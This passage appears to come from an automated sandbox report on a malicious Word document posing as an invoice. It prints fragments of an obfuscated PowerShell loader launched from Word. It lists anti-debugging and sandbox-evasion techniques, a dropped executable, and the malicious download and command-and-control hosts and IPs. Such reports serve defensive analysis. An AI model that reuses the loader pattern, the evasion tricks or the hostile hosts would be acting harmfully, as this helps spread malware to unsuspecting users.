$('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('
May try to detect the Windows Explorer process (often used for injection)
Source: WINWORD.EXE, 00000001.00000002.24909080897.006D0000.00000002.sdmp | Binary or memory string: Progman
Source: WINWORD.EXE, 00000001.00000002.24909080897.006D0000.00000002.sdmp | Binary or memory string: Program Manager
Source: WINWORD.EXE, 00000001.00000002.24909080897.006D0000.00000002.sdmp | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Process queried: DebugPort
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\PartitionClu.exe | Code function: 8_2_003E206F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress
Contains functionality to read the PEB
Source: C:\Users\Public\276299.exe | Code function: 6_2_00421CD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E1CD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\PartitionClu.exe | Code function: 8_2_003E1CD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E1CD0 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\276299.exe | Code function: 6_2_002D2095 GetLastError,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,SetLastError,GetCurrentProcess,GetLastError,wsprintfA,SetLastError,GetCurrentProcessId
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write | page guard

Malware Analysis System Evasion:

Checks the free space of harddrives
Source: C:\Users\Public\276299.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate running services
Source: C:\Users\Public\276299.exe | Code function: EnumServicesStatusExW,OpenServiceW,7_2_003E999F
Source: C:\Users\Public\276299.exe | Code function: EnumServicesStatusExW,GetLastError,7_2_003E9933
Source: C:\Windows\System32\PartitionClu.exe | Code function: EnumServicesStatusExW,OpenServiceW,9_2_003E999F
Source: C:\Windows\System32\PartitionClu.exe | Code function: EnumServicesStatusExW,GetLastError,9_2_003E9933
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Found large amount of non-executed APIs
Source: C:\Users\Public\276299.exe | API coverage: 7.3 %
Source: C:\Windows\System32\PartitionClu.exe | API coverage: 4.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936 | Thread sleep time: -922337203685477s >= -60000s
Source: C:\Users\Public\276299.exe TID: 4044 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\PartitionClu.exe TID: 2152 | Thread sleep time: -120000s >= -60000s
Queries disk information (often used to detect virtual machines)
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Program exit points
Source: C:\Windows\System32\PartitionClu.exe | API call chain: ExitProcess graph end node graph_9-6749
Source: C:\Windows\System32\PartitionClu.exe | API call chain: ExitProcess graph end node graph_9-6673
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Hooking and other Techniques for Hiding and Protection:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 66.198.240.37 80
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 4143
Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 4143
Stores large binary data to the registry
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\data\bd8d549b-fa1b-4da2-9c24-f5d4140d06ce 0
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc.) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\276299.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PartitionClu.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query Windows version
Source: C:\Users\Public\276299.exe Code function: 6_2_00428E60 RtlGetVersion,GetNativeSystemInfo, 6_2_00428E60
Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 62468
Sample: INVOICE-ZZIF-145448203429222.doc
Startdate: 04/06/2018
Architecture: WINDOWS
Score: 100

Sample-level signatures:
  • Multi AV Scanner detection for domain / URL
  • Multi AV Scanner detection for submitted file
  • Obfuscated command line found
  • 10 other signatures

Processes started from the sample: WINWORD.EXE (305 20), PartitionClu.exe, OSPPSVC.EXE

WINWORD.EXE:
  • Obfuscated command line found
  • Very long command line found
  • Document exploit detected (process start blacklist hit)
  • started cmd.exe

cmd.exe:
  • Very long command line found
  • started powershell.exe

powershell.exe:
  • DNS/IP: executivevacation.us 66.198.240.37, 49171, 80 A2HOSTING-A2HostingIncUS United States
  • DNS/IP: clients.steadfast.digital
  • dropped: C:\Users\Public\276299.exe, PE32
  • System process connects to network (likely due to code injection or exploit)
  • Drops PE files to the user root directory
  • Powershell connects to network
  • Powershell drops PE file
  • started 276299.exe

276299.exe:
  • Antivirus detection for dropped file
  • Multi AV Scanner detection for dropped file
  • started 276299.exe

PartitionClu.exe:
  • Drops executables to the windows directory (C:\Windows) and starts them
  • started PartitionClu.exe

PartitionClu.exe (child):
  • DNS/IP: 149.202.153.252, 4143, 49172 OVHFR France
  • DNS/IP: 178.32.255.132, 49174, 8080 OVHFR France (Detected TCP or UDP traffic on non-standard ports)
  • 3 other IPs or domains

Simulations

Behavior and APIs

Time      Type             Description
12:29:26  API Interceptor  5x Sleep call for process: WINWORD.EXE modified
12:29:29  API Interceptor  3x Sleep call for process: OSPPSVC.EXE modified
12:29:30  API Interceptor  1x Sleep call for process: powershell.exe modified
12:29:35  API Interceptor  3x Sleep call for process: 276299.exe modified
12:29:38  API Interceptor  3x Sleep call for process: PartitionClu.exe modified